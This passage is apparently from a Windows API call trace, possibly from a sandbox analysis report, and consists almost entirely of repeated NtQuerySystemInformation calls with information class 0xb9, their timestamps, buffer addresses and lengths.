(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x38, ResultLength=0x0) [0258.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x38, ResultLength=0x0) [0258.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x38, ResultLength=0x0) [0258.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x38, ResultLength=0x0) [0258.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x38, ResultLength=0x0) [0258.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe150, Length=0x40, ResultLength=0x0) [0258.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.402] 